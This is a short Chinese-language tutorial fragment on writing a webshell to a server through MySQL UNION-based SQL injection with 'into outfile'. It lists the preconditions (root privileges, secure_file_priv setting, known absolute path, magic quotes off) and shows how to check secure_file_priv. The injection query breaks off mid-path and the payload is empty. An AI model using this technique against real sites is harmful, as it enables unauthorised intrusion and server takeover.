0x00 利用条件
- root权限
- secure_file_priv=为空或者在网站根目录下(网站根目录为d:\www,secure_file_priv=d:\也可以)
- 知道绝对路径
- gpc关闭,这个应该是php的,会转义单引号,选择路径的时候一定需要单引号
0x01 查看secure_file_priv设置
show global variables like ‘%secure_file_priv%‘;
查询结果
- 5.7.26为null,5.5.29为空
这里为NULL
0x02 联合注入写shell
select * from users where id=-1 union select 1,2,‘‘ into outfile ‘D